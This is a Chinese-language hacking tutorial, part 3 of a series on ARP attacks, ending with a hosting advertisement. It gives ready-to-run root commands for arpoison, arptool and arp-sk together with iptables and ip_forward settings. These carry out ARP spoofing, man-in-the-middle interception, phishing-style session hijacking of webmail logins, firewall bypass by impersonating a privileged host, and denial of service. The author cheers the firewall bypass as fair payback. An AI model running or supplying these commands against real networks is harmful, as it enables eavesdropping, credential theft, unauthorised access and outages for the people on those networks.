戰(zhàn)術(shù)攻防之近距離搏擊篇(ARP)攻擊(3)

雖然MAC泛洪的攻擊方式帶了一些恐慌，但是由于這種方式在很多場(chǎng)合成功概率不高，且這種攻擊方式太過(guò)于激進(jìn)，以至于聰明的網(wǎng)管能很快分析網(wǎng)絡(luò)并馬上制止這種行為的擴(kuò)散，因此一種稱之為ARP欺騙的隱蔽的ARP中毒演變攻擊進(jìn)入了Cyber空間。

首先假設(shè)一個(gè)場(chǎng)景：假如主機(jī)A要想獲得主機(jī)B的MAC，它需發(fā)送arp-request數(shù)據(jù)包到廣播地址，主機(jī)B會(huì)以自身地址回應(yīng)這個(gè)請(qǐng)求。但假如主機(jī)C在主機(jī)B之前作出回應(yīng)。主機(jī)A則在其緩存中設(shè)置主機(jī)C的MAC地址。

12:50:31.198300 arp who-has hostB tell hostA   [1]

12:50:31.198631 arp reply hostC is-at 4e:73:02:4b:3f:94  [2]

于是我們構(gòu)造了欺騙行為，但由于主機(jī)A發(fā)送的是廣播包，因此主機(jī)B也會(huì)應(yīng)答：

12:50:31.198862 arp reply hostB is-at 4e:80:51:d1:5e:f5  [3]

那么主機(jī)A的ARP緩存很有可能被刷新，但是由于緩存的無(wú)驗(yàn)證即時(shí)更新機(jī)制，只要主機(jī)C不斷發(fā)送偽造的回應(yīng)包，那么主機(jī)A的緩存列表中就能一直保存主機(jī)C的MAC地址。(假如主機(jī)不發(fā)送arp-request，向其發(fā)送arp-reply并無(wú)太大意思，因?yàn)榫彺娌粫?huì)更新一個(gè)不存在的記錄)。其實(shí)現(xiàn)原理如圖：

了解ARP欺騙的方式后，其準(zhǔn)確定義如下：利用以太和IP協(xié)議之間的交互關(guān)系而形成的攻擊方法，比如，偽造目標(biāo)計(jì)算機(jī)的MAC地址以獲取其控制權(quán)。其表現(xiàn)形式為構(gòu)造虛假arp-request和arp-reply數(shù)據(jù)包以實(shí)現(xiàn)欺騙目的。

這種欺騙方式主要用于交換網(wǎng)絡(luò)結(jié)構(gòu)(對(duì)于HUB結(jié)構(gòu)，可以直接對(duì)目標(biāo)主機(jī)進(jìn)行強(qiáng)制控制，使用欺騙方式似乎是種累贅),因此交換網(wǎng)的堅(jiān)固性似乎變的脆弱很多。

使用arpoison小程序可以發(fā)送自定義硬件和IP地址的arp-reply包給目標(biāo)主機(jī)，對(duì)其實(shí)行欺騙行為。

[root@hackersvr arpoison]# ./arpoison –I eth0 –d {hostA_ipaddr} –s {hostB_ipaddr} –t 00:13:0E:19:85:03 –r {hostC_mac_addr}ARP packet sent via eth0

# 1、主機(jī)C大量使用自己MAC回應(yīng)主機(jī)A的請(qǐng)求，導(dǎo)致主機(jī)A被蒙騙與主機(jī)進(jìn)行通信。

# 2、假如{- r}參數(shù)所設(shè)置的MAC為一個(gè)不存在的MAC地址，則會(huì)導(dǎo)致主機(jī)B與主機(jī)C之間的TCP

# 會(huì)話臨時(shí)性強(qiáng)行斷開(kāi)。

# 3、假如想更新網(wǎng)絡(luò)中所有主機(jī)系統(tǒng)，可以發(fā)送廣播MAC地址FF:FF:FF:FF:FF:FF

◆中間人攻擊(Man In the Middle，MIM)

在ARP方式的攻擊，最有意思的環(huán)節(jié)莫過(guò)于MIM，這種非常隱蔽方式可以在兩臺(tái)通信的計(jì)算機(jī)之間進(jìn)行橋接方式的監(jiān)聽(tīng)，并且非常不容易被發(fā)現(xiàn)，可謂是偷盜學(xué)術(shù)上的典范運(yùn)用。

攻擊者駁接本地網(wǎng)絡(luò)，分別向主機(jī)A和主機(jī)B發(fā)送適當(dāng)?shù)膫卧霢rp-reply包，蒙蔽其所認(rèn)為的正確的通信目標(biāo)，并建立轉(zhuǎn)發(fā)規(guī)則，實(shí)現(xiàn)主機(jī)A與主機(jī)B之間的數(shù)據(jù)通信。使數(shù)據(jù)鏈路表面上看似A與B的正常通信，實(shí)則通過(guò)了攻擊者的機(jī)器進(jìn)行代理轉(zhuǎn)發(fā)。

采用arptool可以輕松實(shí)現(xiàn)這類入侵方式：

arptool用法: arptool

用于發(fā)送數(shù)據(jù)包的網(wǎng)卡

發(fā)送的ARP類型包

tell    arp-reply類型數(shù)據(jù)包

bcast   當(dāng)攻擊對(duì)象是linux操作系統(tǒng)，可使用此參數(shù)代替tell

/        目標(biāo)IP/MAC地址對(duì)

/        源IP/MAC地址對(duì)

1、分別對(duì)主機(jī)A/B實(shí)施ARP攻擊

[root@hackersvr arptool]#ping 192.168.1.1
[root@hackersvr arptool]#ping 192.168.1.2
[root@hackersvr arptool]#arp –a
?(192.168.1.1) at 01.01.01.01.01.01 [ether] on eth0
?(192.168.1.2) at 02.02.02.02.02.02 [ether] on eth0
[root@hackersvr arptool]# ./arptool eth0 tell 192.168.1.1 01:01:01:01:01:01 192.168.1.2 03:03:03:03:03:03
[root@hackersvr arptool]#./arptool eth0 tell 192.168.1.2 02:02:02:02:02:02 192.168.1.1 03:03:03:03:03:03

現(xiàn)在我們可以透明代理主機(jī)A/B之間的應(yīng)用程序數(shù)據(jù)通信?，比如攻擊者可以修改主機(jī)A/B之間的HTTP事務(wù)提交，但這需要我們?cè)谄溟g建立橋接轉(zhuǎn)發(fā)關(guān)系。

2、橋接主機(jī)A/B之間通信

[root@hackersvr arptool]＃e cho 1 > /proc/sys/net/ipv4/ip_forward
[root@hackersvr arptool]#iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2
-d 192.168.1.1 --dport 80 -j REDIRECT --to-port 80

通過(guò)這種方式，我們可以監(jiān)聽(tīng)、修改、切斷和劫持主機(jī)A/B之間的任何應(yīng)用通信數(shù)據(jù)，似乎整個(gè)網(wǎng)絡(luò)陷落在一種前所未有的慌亂之中。

◆知識(shí)組合攻擊

arp-sk在arp方式攻擊中，享有“瑞士軍刀”的美譽(yù)，它可以維護(hù)所有設(shè)備的ARP表。通過(guò)發(fā)送適合的ARP數(shù)據(jù)包，它可以實(shí)現(xiàn)ARP的所有類型攻擊，非常強(qiáng)悍的工具。本節(jié)將采用arp-sk講解會(huì)話劫持、偷越防火墻和拒絕服務(wù)攻擊的思維方式。

1、 代理會(huì)話劫持(hijacking)

攻擊者架設(shè)HTTP服務(wù)器模擬遠(yuǎn)程網(wǎng)站的一部分站點(diǎn)(這部分網(wǎng)頁(yè)用于劫持主機(jī)B客戶輸入相關(guān)信息，例如用戶名或ID)。而不需要模擬的站點(diǎn)則代理轉(zhuǎn)發(fā)至真實(shí)站點(diǎn)，這種高超的詐騙技巧非常 隱蔽。當(dāng)我們盡情享受網(wǎng)絡(luò)沖浪的愉快時(shí)，誰(shuí)會(huì)想到這是個(gè)陷阱？

發(fā)送arp-reply分別攻擊防火墻和目標(biāo)主機(jī)

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.2 -S 192.168.1.4 -D 192.168.1.2
+ Running mode "reply"
+ IfName: eth0
+ Source MAC: 03:03:03:03:03:03
+ Source ARP MAC: 03:03:03:03:03:03
+ Source ARP IP : 192.168.1.4 (gateway)
+ Target MAC: 02:02:02:02:02:02
+ Target ARP MAC: 02:02:02:02:02:02
+ Target ARP IP : 192.168.1.2 (hostB)
[...]
[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4
+ Running mode "reply"
+ IfName: eth0
+ Source MAC: 03:03:03:03:03:03
+ Source ARP MAC: 03:03:03:03:03:03
+ Source ARP IP : 192.168.1.4 (hostB)
+ Target MAC: 04:04:04:04:04:04
+ Target ARP MAC: 04:04:04:04:04:04
+ Target ARP IP : 192.168.1.4 (gateway)
[...]
# 代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(diǎn)(攻擊者模擬hotmail站點(diǎn)，偽裝提供服務(wù))
[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \
-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(diǎn)(攻擊者模擬hotmail站點(diǎn)，偽裝提供服務(wù))

[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \
-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

當(dāng)使用轉(zhuǎn)發(fā)設(shè)置，目標(biāo)主機(jī)使用ping命令可以檢測(cè)到其數(shù)據(jù)包的重定向，因此這里阻擋icmp重 定向的信息。

[root@hackersvr arp-sk]# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

OK，剩下的事情就是如何如何使用嗅探工具、數(shù)據(jù)捕獲工具或自行定義的腳本來(lái)觀測(cè)目標(biāo)主機(jī)的# 沖浪行為，并可以掌握他所有一切上網(wǎng)信息，諸如：郵件帳戶、論壇ID等。(這些使用方法超出

本文所論述的arp攻擊行為，不予討論)

2、 偷越防火墻

網(wǎng)絡(luò)權(quán)利的不均衡總?cè)囚[一些自負(fù)的家伙。由于網(wǎng)管的存在和防火墻的規(guī)則的設(shè)置，使得某些具有特權(quán)的計(jì)算機(jī)才能任意的訪問(wèn)整個(gè)互連網(wǎng)，這為其它機(jī)器的使用者潛埋下嫉妒和羨慕的心理成分。為了反擊這種權(quán)利不均衡，Arp方式的欺騙訪問(wèn)再一次獲得成功！?

原理圖六中，虛線代表主機(jī)B的正常出網(wǎng)訪問(wèn)，通過(guò)Arp攻擊后，攻擊者以主機(jī)B的身份特權(quán)對(duì)互連網(wǎng)進(jìn)行任意訪問(wèn)，并分離主機(jī)B的網(wǎng)絡(luò)訪問(wèn)，使主機(jī)B網(wǎng)絡(luò)訪問(wèn)正常無(wú)異，防火墻的訪問(wèn)限

制形如虛設(shè)。

只需要對(duì)防火墻進(jìn)行攻擊，不需要對(duì)主機(jī)B實(shí)施攻擊

[root@hackersvr arp-sk]# arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

使用Linux的Netfilter框架，很容易分離屬于攻擊者網(wǎng)絡(luò)訪問(wèn)流和屬于主機(jī)B的網(wǎng)絡(luò)訪問(wèn)流

[root@hackersvr arp-sk]# iptables -t nat -A POSTROUTING -j SNAT --to 192.168.1.2

一切的完美幾乎就在幾句簡(jiǎn)單的語(yǔ)句之間完成，我想起史蒂文?列維的幾句真言：

1、進(jìn)入（訪問(wèn)）計(jì)算機(jī)應(yīng)該是不受限制的和絕對(duì)的；

2、一切信息都應(yīng)該是免費(fèi)的；

3、懷疑權(quán)威，反對(duì)壟斷；

4、任何一個(gè)人都能在計(jì)算機(jī)上創(chuàng)造藝術(shù)和美；

5、計(jì)算機(jī)能夠使生活變得更美好

于是，攻擊在此刻似乎也變的美麗了許多。

3、 拒絕服務(wù)攻擊(DoS)

有了上面學(xué)習(xí)過(guò)程，這里實(shí)現(xiàn)Dos攻擊的方式變的相當(dāng)簡(jiǎn)單，對(duì)于攻擊者所代理轉(zhuǎn)發(fā)的數(shù)據(jù)包進(jìn)行阻塞，從而達(dá)到這種卑劣的目的。(我相當(dāng)反感這種攻擊方式，因此我也非常討厭?cǎi){御它進(jìn)行攻擊的人，因此我希望這類攻擊方式只用于實(shí)驗(yàn)?zāi)康模�不要濫用！)

利用Linux得力的iptables工具，方便實(shí)現(xiàn)數(shù)據(jù)堵塞

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.1 -j DROP
[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.2 -j DROP
[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.4 -j DROP

另一種方式是制造一個(gè)Mac”黑洞”，既使用不存在的mac地址使目標(biāo)主機(jī)從網(wǎng)絡(luò)地圖上消失。

如下句法使hostA認(rèn)為hostB已經(jīng)離開(kāi)網(wǎng)絡(luò)了：

[root@hackersvr arp-sk]# arp-sk -r -d hostB -S hostA --rand-arp-hwa-src -D hostB

通過(guò)了解Arp原理，我們發(fā)現(xiàn)這些攻擊方式非常有趣，并且思路簡(jiǎn)單，實(shí)現(xiàn)方法也相當(dāng)容易。但這些小技巧不過(guò)是Arp攻擊的基礎(chǔ)層面，下面的部分將深入討論一些Arp高級(jí)利用技巧，其攻擊思維的精妙之處令我贊嘆不止。

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]